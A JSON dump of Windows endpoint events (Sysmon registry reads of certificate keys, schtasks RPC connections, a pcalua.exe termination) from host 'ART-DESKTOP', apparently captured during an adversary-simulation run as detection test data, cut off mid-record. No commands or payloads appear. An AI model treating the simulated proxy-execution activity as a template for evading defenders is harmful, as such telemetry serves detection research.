"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.Media.Devices.dll", - "image_path": "C:\\Windows\\System32\\Windows.Media.Devices.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "destination_address": "0:0:0:0:0:0:0:1", - "destination_port": "135", - "event_type": "network", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "protocol": "tcp", - "source_address": "0:0:0:0:0:0:0:1", - "source_port": "50509", - "subtype": "outgoing", - "timestamp": 131883573971910000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "destination_address": "0:0:0:0:0:0:0:1", - "destination_port": "50509", - "event_type": "network", - "pid": 928, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "tcp", - "source_address": "0:0:0:0:0:0:0:1", - "source_port": "135", - "subtype": "incoming", - "timestamp": 131883573971920000, - "unique_pid": "{42FC7E13-B293-5C05-0000-001038180100}", - "user": "NT AUTHORITY\\NETWORK SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "NETWORK SERVICE" - }, - { - "destination_address": "0:0:0:0:0:0:0:1", - "destination_port": "49667", - "event_type": "network", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "protocol": "tcp", - "source_address": "0:0:0:0:0:0:0:1", - "source_port": "50510", - "subtype": "outgoing", - "timestamp": 131883573971940000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "destination_address": "0:0:0:0:0:0:0:1", - "destination_port": "50510", - "event_type": "network", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "tcp", - "source_address": "0:0:0:0:0:0:0:1", - "source_port": "49667", - "subtype": "incoming", - "timestamp": 131883573971940000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883573997490000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883573997490000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574007050000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_value": "W32:000000000008056A", - "timestamp": 131883574007350000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "terminate", - "timestamp": 131883574007350000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574007350000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574007350000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 